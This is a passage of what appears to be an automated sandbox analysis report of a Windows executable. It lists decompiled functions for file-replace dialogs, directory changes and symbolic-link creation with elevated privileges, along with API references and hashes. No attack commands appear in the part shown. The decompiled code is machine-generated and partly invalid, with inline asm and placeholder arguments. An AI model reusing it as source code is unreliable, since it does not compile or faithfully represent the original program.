                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 660f5bf91a88677a87905fe960a9c62afe201a4632cd29bb22dcd2654adcbec3
                                                    • Instruction ID: 42add9c61b296add59a1348830954788e19fa5e51da7a8f458f030caa9ad4914
                                                    • Opcode Fuzzy Hash: 660f5bf91a88677a87905fe960a9c62afe201a4632cd29bb22dcd2654adcbec3
                                                    • Instruction Fuzzy Hash: 63A011C22A80883C3008B2A22E82C3B022CC8C0B2A330822FFA00C82C0B88008002832
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 58%
                                                    			E00CC9F09(void* __ecx) {
                                                    				int _t2;
                                                    
                                                    				_t2 = SetEndOfFile( *(__ecx + 8)); // executed
                                                    				asm("sbb al, al");
                                                    				return  ~(_t2 - 1) + 1;
                                                    			}





                                                    APIs
                                                    • SetEndOfFile.KERNELBASE(?,00CC903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CC9F0C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File
                                                    • String ID:
                                                    • API String ID: 749574446-0
                                                    • Opcode ID: 213ecbf179ae96e554054b617548102978a48f65569dcbac4b993f0a496b7d29
                                                    • Instruction ID: b71d1c34e2aa4a9568177139f87d60ad5b95fbd3556761eb7e23fef4d78663a9
                                                    • Opcode Fuzzy Hash: 213ecbf179ae96e554054b617548102978a48f65569dcbac4b993f0a496b7d29
                                                    • Instruction Fuzzy Hash: 46A0223008000E8BCE802B30CE0832C3B20FB20BC030002E8A00BCF0B2CF23880BCB22
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDAC04(WCHAR* _a4) {
                                                    				signed int _t4;
                                                    
                                                    				_t4 = SetCurrentDirectoryW(_a4); // executed
                                                    				return _t4 & 0xffffff00 | _t4 != 0x00000000;
                                                    			}





                                                    APIs
                                                    • SetCurrentDirectoryW.KERNELBASE(?,00CDAE72,C:\Users\user\Desktop,00000000,00D0946A,00000006), ref: 00CDAC08
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID:
                                                    • API String ID: 1611563598-0
                                                    • Opcode ID: 3abf8698f24b160306dbfa8825a6738f30d59f68449f0b26a1f93a215c6d046a
                                                    • Instruction ID: 7047a7c49c397a36f661c657ce57c610b61bf05168a7205450f4a010cefadb91
                                                    • Opcode Fuzzy Hash: 3abf8698f24b160306dbfa8825a6738f30d59f68449f0b26a1f93a215c6d046a
                                                    • Instruction Fuzzy Hash: 2EA01130200280AB82000B328F0AB0EBAAAAFA2B00F00C028A00088030CB30C820EA02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 70%
                                                    			E00CDC220(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
                                                    				struct _FILETIME _v0;
                                                    				struct _SYSTEMTIME _v12;
                                                    				struct _SYSTEMTIME _v16;
                                                    				struct _FILETIME _v24;
                                                    				void* _t74;
                                                    				void* _t137;
                                                    				long _t138;
                                                    				void* _t142;
                                                    				void* _t143;
                                                    				void* _t144;
                                                    				void* _t145;
                                                    				void* _t146;
                                                    				signed short _t148;
                                                    				void* _t149;
                                                    				void* _t150;
                                                    				intOrPtr _t152;
                                                    				signed int _t153;
                                                    				signed int _t157;
                                                    				struct HWND__* _t158;
                                                    				intOrPtr _t159;
                                                    				void* _t160;
                                                    				int _t162;
                                                    				int _t165;
                                                    				void* _t168;
                                                    				void* _t170;
                                                    
                                                    				_t156 = __edx;
                                                    				E00CDEC50(0x1a50);
                                                    				_t148 = _a6748;
                                                    				_t159 = _a6744;
                                                    				_t158 = _a6740;
                                                    				if(E00CC1316(__edx, _t158, _t159, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
                                                    					_t160 = _t159 - 0x110;
                                                    					if(_t160 == 0) {
                                                    						SetFocus(GetDlgItem(_t158, 0x6c));
                                                    						E00CD0602( &_a2640, _a6752, 0x800);
                                                    						E00CCC36E( &_a2628,  &_a2628, 0x800);
                                                    						SetDlgItemTextW(_t158, 0x65,  &_a2616);
                                                    						 *0xd23074( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
                                                    						SendDlgItemMessageW(_t158, 0x66, 0x170, _a1904, 0);
                                                    						_t149 = FindFirstFileW( &_a2596,  &_a288);
                                                    						if(_t149 != 0xffffffff) {
                                                    							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
                                                    							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
                                                    							_push(0x32);
                                                    							_push( &_a12);
                                                    							_push(0);
                                                    							_push( &_v12);
                                                    							_t162 = 2;
                                                    							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
                                                    							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
                                                    							_push( &_a12);
                                                    							_push( &_a112);
                                                    							E00CC4092( &_a900, 0x200, L"%s %s %s", E00CCE617(0x99));
                                                    							_t170 = _t168 + 0x18;
                                                    							SetDlgItemTextW(_t158, 0x6a,  &_a900);
                                                    							FindClose(_t149);
                                                    							if((_a308 & 0x00000010) != 0) {
                                                    								_t150 = 0x200;
                                                    							} else {
                                                    								asm("adc eax, ebp");
                                                    								E00CDAF0F(0 + _a344, _a340,  &_a212, 0x32);
                                                    								_push(E00CCE617(0x98));
                                                    								_t150 = 0x200;
                                                    								E00CC4092( &_a884, 0x200, L"%s %s",  &_a192);
                                                    								_t170 = _t170 + 0x14;
                                                    								SetDlgItemTextW(_t158, 0x68,  &_a884);
                                                    							}
                                                    							SendDlgItemMessageW(_t158, 0x67, 0x170, _a1928, 0);
                                                    							_t152 =  *0xd08464; // 0x0
                                                    							E00CD138A(_t152, _t156,  &_a4);
                                                    							FileTimeToLocalFileTime( &_v0,  &_v24);
                                                    							FileTimeToSystemTime( &_v24,  &_v16);
                                                    							GetTimeFormatW(0x400, _t162,  &_v16, 0,  &_a8, 0x32);
                                                    							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
                                                    							_push( &_a8);
                                                    							_push( &_a108);
                                                    							E00CC4092( &_a896, _t150, L"%s %s %s", E00CCE617(0x99));
                                                    							_t168 = _t170 + 0x18;
                                                    							SetDlgItemTextW(_t158, 0x6b,  &_a896);
                                                    							_t153 =  *0xd1ec8c;
                                                    							_t157 =  *0xd1ec88;
                                                    							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
                                                    								E00CDAF0F(_t157, _t153,  &_a212, 0x32);
                                                    								_push(E00CCE617(0x98));
                                                    								E00CC4092( &_a884, _t150, L"%s %s",  &_a192);
                                                    								_t168 = _t168 + 0x14;
                                                    								SetDlgItemTextW(_t158, 0x69,  &_a884);
                                                    							}
                                                    						}
                                                    						L27:
                                                    						_t74 = 0;
                                                    						L28:
                                                    						return _t74;
                                                    					}
                                                    					if(_t160 != 1) {
                                                    						goto L27;
                                                    					}
                                                    					_t165 = 2;
                                                    					_t137 = (_t148 & 0x0000ffff) - _t165;
                                                    					if(_t137 == 0) {
                                                    						L11:
                                                    						_push(6);
                                                    						L12:
                                                    						_pop(_t165);
                                                    						L13:
                                                    						_t138 = SendDlgItemMessageW(_t158, 0x66, 0x171, 0, 0);
                                                    						if(_t138 != 0) {
                                                    							 *0xd230d0(_t138);
                                                    						}
                                                    						EndDialog(_t158, _t165);
                                                    						goto L1;
                                                    					}
                                                    					_t142 = _t137 - 0x6a;
                                                    					if(_t142 == 0) {
                                                    						_t165 = 0;
                                                    						goto L13;
                                                    					}
                                                    					_t143 = _t142 - 1;
                                                    					if(_t143 == 0) {
                                                    						_t165 = 1;
                                                    						goto L13;
                                                    					}
                                                    					_t144 = _t143 - 1;
                                                    					if(_t144 == 0) {
                                                    						_push(4);
                                                    						goto L12;
                                                    					}
                                                    					_t145 = _t144 - 1;
                                                    					if(_t145 == 0) {
                                                    						goto L13;
                                                    					}
                                                    					_t146 = _t145 - 1;
                                                    					if(_t146 == 0) {
                                                    						_push(3);
                                                    						goto L12;
                                                    					}
                                                    					if(_t146 != 1) {
                                                    						goto L27;
                                                    					}
                                                    					goto L11;
                                                    				}
                                                    				L1:
                                                    				_t74 = 1;
                                                    				goto L28;
                                                    			}




























                                                    0x00cdc261
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CDC2B1
                                                    • EndDialog.USER32(?,00000006), ref: 00CDC2C4
                                                    • GetDlgItem.USER32(?,0000006C), ref: 00CDC2E0
                                                    • SetFocus.USER32(00000000), ref: 00CDC2E7
                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CDC321
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CDC358
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDC36E
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDC38C
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDC39C
                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CDC3B8
                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CDC3D4
                                                    • _swprintf.LIBCMT ref: 00CDC404
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CDC417
                                                    • FindClose.KERNEL32(00000000), ref: 00CDC41E
                                                    • _swprintf.LIBCMT ref: 00CDC477
                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CDC48A
                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CDC4A7
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CDC4C7
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDC4D7
                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CDC4F1
                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CDC509
                                                    • _swprintf.LIBCMT ref: 00CDC535
                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CDC548
                                                    • _swprintf.LIBCMT ref: 00CDC59C
                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CDC5AF
                                                      • Part of subcall function 00CDAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CDAF35
                                                      • Part of subcall function 00CDAF0F: GetNumberFormatW.KERNEL32 ref: 00CDAF84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                    • API String ID: 797121971-1840816070
                                                    • Opcode ID: c4076ef636af2c711847cb9d7d3959c85af17feaca2ca79853c14c216070b606
                                                    • Instruction ID: cd1ebc94a721000d9124942cb92c8d98a5a3b800f47e1a861e9cf47a160ac87d
                                                    • Opcode Fuzzy Hash: c4076ef636af2c711847cb9d7d3959c85af17feaca2ca79853c14c216070b606
                                                    • Instruction Fuzzy Hash: 6391A172248349BBD2219BA0DC89FFB77ACEB5A700F04481AF749C2181DB75A605DB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E00CC6FAA(void* __edx) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* _t98;
                                                    				void* _t109;
                                                    				signed int _t112;
                                                    				intOrPtr _t117;
                                                    				signed int _t134;
                                                    				long _t154;
                                                    				void* _t182;
                                                    				void* _t186;
                                                    				void* _t190;
                                                    				void* _t194;
                                                    				short _t195;
                                                    				void* _t199;
                                                    				WCHAR* _t200;
                                                    				long _t201;
                                                    				signed int _t203;
                                                    				signed int _t204;
                                                    				signed int _t205;
                                                    				signed int _t229;
                                                    				intOrPtr* _t233;
                                                    				intOrPtr* _t234;
                                                    				void* _t236;
                                                    				intOrPtr _t237;
                                                    				signed int _t238;
                                                    				void* _t239;
                                                    				intOrPtr _t240;
                                                    				signed int _t242;
                                                    				intOrPtr _t244;
                                                    				short _t245;
                                                    				void* _t246;
                                                    				intOrPtr _t250;
                                                    				short _t252;
                                                    				void* _t253;
                                                    				void* _t255;
                                                    				void* _t256;
                                                    
                                                    				E00CDEB78(_t98, _t253);
                                                    				E00CDEC50(0x30a8);
                                                    				if( *0xd01023 == 0) {
                                                    					E00CC7A9C(L"SeRestorePrivilege");
                                                    					E00CC7A9C(L"SeCreateSymbolicLinkPrivilege");
                                                    					 *0xd01023 = 1;
                                                    				}
                                                    				_t203 = _t253 - 0x2c;
                                                    				E00CC13BA(_t203, 0x1418);
                                                    				_t244 =  *((intOrPtr*)(_t253 + 0x10));
                                                    				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
                                                    				E00CD0602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
                                                    				 *(_t253 - 0x14) = E00CE3E13(_t253 - 0x107c);
                                                    				_t236 = _t253 - 0x107c;
                                                    				_t199 = _t253 - 0x207c;
                                                    				_t109 = E00CE6088(_t236, L"\\??\\", 4);
                                                    				_t256 = _t255 + 0x10;
                                                    				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
                                                    				 *(_t253 - 0xd) = _t204;
                                                    				if(_t109 == 0) {
                                                    					_t236 = _t253 - 0x1074;
                                                    				}
                                                    				if(_t204 != 0) {
                                                    					_t194 = E00CE6088(_t236, L"UNC\\", 4);
                                                    					_t256 = _t256 + 0xc;
                                                    					if(_t194 == 0) {
                                                    						_t195 = 0x5c;
                                                    						 *((short*)(_t253 - 0x207c)) = _t195;
                                                    						_t199 = _t253 - 0x207a;
                                                    						_t236 = _t236 + 6;
                                                    					}
                                                    				}
                                                    				E00CE6066(_t199, _t236);
                                                    				_t112 = E00CE3E13(_t253 - 0x207c);
                                                    				_t237 =  *((intOrPtr*)(_t253 + 8));
                                                    				_t200 =  *(_t253 + 0xc);
                                                    				 *(_t253 - 0x18) = _t112;
                                                    				if( *((char*)(_t237 + 0x7197)) != 0) {
                                                    					L11:
                                                    					E00CCA0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
                                                    					if(E00CCA231(_t200) != 0) {
                                                    						_t186 = E00CCA28F(E00CCA243(_t200));
                                                    						_push(_t200);
                                                    						if(_t186 == 0) {
                                                    							E00CCA1E0();
                                                    						} else {
                                                    							E00CCA18F();
                                                    						}
                                                    					}
                                                    					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
                                                    						__eflags = CreateDirectoryW(_t200, 0);
                                                    						if(__eflags != 0) {
                                                    							goto L20;
                                                    						}
                                                    						_t201 = 0;
                                                    						E00CC2021(__eflags, 0x14, 0, _t200);
                                                    						E00CC6D83(0xd01098, 9);
                                                    						goto L41;
                                                    					} else {
                                                    						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
                                                    						if(_t182 != 0xffffffff) {
                                                    							CloseHandle(_t182);
                                                    							L20:
                                                    							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
                                                    							__eflags = _t117 - 3;
                                                    							if(_t117 != 3) {
                                                    								__eflags = _t117 - 2;
                                                    								if(_t117 == 2) {
                                                    									L26:
                                                    									_t233 =  *(_t253 - 0x2c);
                                                    									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
                                                    									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
                                                    									 *_t233 = 0xa000000c;
                                                    									_t245 = _t205 + _t205;
                                                    									 *((short*)(_t233 + 0xa)) = _t245;
                                                    									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
                                                    									 *((intOrPtr*)(_t233 + 6)) = 0;
                                                    									E00CE6066(_t233 + 0x14, _t253 - 0x107c);
                                                    									_t246 =  *(_t253 - 0x2c);
                                                    									 *((short*)(_t246 + 0xc)) = _t245 + 2;
                                                    									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
                                                    									E00CE6066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
                                                    									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
                                                    									__eflags = _t134;
                                                    									 *(_t246 + 0x10) = _t134;
                                                    									L27:
                                                    									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
                                                    									__eflags = _t239 - 0xffffffff;
                                                    									if(_t239 != 0xffffffff) {
                                                    										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
                                                    										if(__eflags != 0) {
                                                    											E00CC9556(_t253 - 0x30b4);
                                                    											 *(_t253 - 4) = 1;
                                                    											E00CC7A7B(_t253 - 0x30b4, _t239);
                                                    											_t240 =  *((intOrPtr*)(_t253 + 8));
                                                    											_t247 =  *((intOrPtr*)(_t253 + 0x10));
                                                    											asm("sbb ecx, ecx");
                                                    											asm("sbb ecx, ecx");
                                                    											asm("sbb ecx, ecx");
                                                    											E00CC9DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
                                                    											E00CC9620(_t253 - 0x30b4);
                                                    											__eflags =  *((char*)(_t240 + 0x71a8));
                                                    											if( *((char*)(_t240 + 0x71a8)) == 0) {
                                                    												E00CCA4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
                                                    											}
                                                    											_t201 = 1;
                                                    											E00CC959A(_t253 - 0x30b4);
                                                    											L41:
                                                    											E00CC15FB(_t253 - 0x2c);
                                                    											 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
                                                    											return _t201;
                                                    										}
                                                    										CloseHandle(_t239);
                                                    										E00CC2021(__eflags, 0x15, 0, _t200);
                                                    										_t154 = GetLastError();
                                                    										__eflags = _t154 - 5;
                                                    										if(_t154 == 5) {
                                                    											L32:
                                                    											__eflags = E00CD07BC();
                                                    											if(__eflags == 0) {
                                                    												E00CC15C6(_t253 - 0x7c, 0x18);
                                                    												E00CD15FE(_t253 - 0x7c);
                                                    											}
                                                    											L34:
                                                    											E00CC6DCB(0xd01098, __eflags);
                                                    											E00CC6D83(0xd01098, 9);
                                                    											_t250 =  *((intOrPtr*)(_t253 + 0x10));
                                                    											_push(_t200);
                                                    											__eflags =  *((char*)(_t250 + 0x10f1));
                                                    											if( *((char*)(_t250 + 0x10f1)) == 0) {
                                                    												DeleteFileW();
                                                    											} else {
                                                    												RemoveDirectoryW();
                                                    											}
                                                    											L37:
                                                    											_t201 = 0;
                                                    											goto L41;
                                                    										}
                                                    										__eflags = _t154 - 0x522;
                                                    										if(__eflags != 0) {
                                                    											goto L34;
                                                    										}
                                                    										goto L32;
                                                    									}
                                                    									E00CC6C23(_t200);
                                                    									E00CC6D83(0xd01098, 9);
                                                    									goto L37;
                                                    								}
                                                    								__eflags = _t117 - 1;
                                                    								if(_t117 != 1) {
                                                    									goto L37;
                                                    								}
                                                    								goto L26;
                                                    							}
                                                    							_t234 =  *(_t253 - 0x2c);
                                                    							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
                                                    							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
                                                    							 *_t234 = 0xa0000003;
                                                    							_t252 = _t229 + _t229;
                                                    							 *((short*)(_t234 + 0xa)) = _t252;
                                                    							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
                                                    							 *((intOrPtr*)(_t234 + 6)) = 0;
                                                    							E00CE6066(_t234 + 0x10, _t253 - 0x107c);
                                                    							_t246 =  *(_t253 - 0x2c);
                                                    							 *((short*)(_t246 + 0xc)) = _t252 + 2;
                                                    							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
                                                    							E00CE6066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
                                                    							goto L27;
                                                    						}
                                                    						E00CC6C23(_t200);
                                                    						goto L37;
                                                    					}
                                                    				}
                                                    				if( *(_t253 - 0xd) != 0) {
                                                    					goto L37;
                                                    				}
                                                    				_t190 = E00CCBCC3(_t244 + 0x1104);
                                                    				_t269 = _t190;
                                                    				if(_t190 != 0) {
                                                    					goto L37;
                                                    				}
                                                    				_push(_t244 + 0x1104);
                                                    				_push(_t200);
                                                    				_push(_t244 + 0x28);
                                                    				_push(_t237);
                                                    				if(E00CC7861(_t269) == 0) {
                                                    					goto L37;
                                                    				}
                                                    				goto L11;
                                                    			}

                                                    0x00cc73fe
                                                    0x00cc73fe
                                                    0x00cc72e3
                                                    0x00cc72ee
                                                    0x00cc72f3
                                                    0x00cc72f9
                                                    0x00cc72fc
                                                    0x00cc7305
                                                    0x00cc730a
                                                    0x00cc730c
                                                    0x00cc7313
                                                    0x00cc731b
                                                    0x00cc731b
                                                    0x00cc7320
                                                    0x00cc7327
                                                    0x00cc7330
                                                    0x00cc7335
                                                    0x00cc7338
                                                    0x00cc7339
                                                    0x00cc7340
                                                    0x00cc734a
                                                    0x00cc7342
                                                    0x00cc7342
                                                    0x00cc7342
                                                    0x00cc7350
                                                    0x00cc7350
                                                    0x00000000
                                                    0x00cc7350
                                                    0x00cc72fe
                                                    0x00cc7303
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc7303
                                                    0x00cc72ad
                                                    0x00cc72b6
                                                    0x00000000
                                                    0x00cc72b6
                                                    0x00cc720a
                                                    0x00cc720d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc720d
                                                    0x00cc716d
                                                    0x00cc7170
                                                    0x00cc7176
                                                    0x00cc7179
                                                    0x00cc717f
                                                    0x00cc7182
                                                    0x00cc7190
                                                    0x00cc7196
                                                    0x00cc71a4
                                                    0x00cc71ac
                                                    0x00cc71af
                                                    0x00cc71b6
                                                    0x00cc71cb
                                                    0x00000000
                                                    0x00cc71d0
                                                    0x00cc714a
                                                    0x00000000
                                                    0x00cc714a
                                                    0x00cc7114
                                                    0x00cc70a2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc70af
                                                    0x00cc70b4
                                                    0x00cc70b6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc70c2
                                                    0x00cc70c3
                                                    0x00cc70c7
                                                    0x00cc70c8
                                                    0x00cc70d0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC6FAA
                                                    • _wcslen.LIBCMT ref: 00CC7013
                                                    • _wcslen.LIBCMT ref: 00CC7084
                                                      • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                      • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                      • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                      • Part of subcall function 00CCA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641,000000FF), ref: 00CCA1F1
                                                      • Part of subcall function 00CCA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641), ref: 00CCA21F
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CC7139
                                                    • CloseHandle.KERNEL32(00000000), ref: 00CC7155
                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CC7298
                                                      • Part of subcall function 00CC9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CC73BC,?,?,?,00000000), ref: 00CC9DBC
                                                      • Part of subcall function 00CC9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CC9E70
                                                      • Part of subcall function 00CC9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00CC95D6,?,?,?,?,?,00CF2641,000000FF), ref: 00CC963B
                                                      • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                      • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
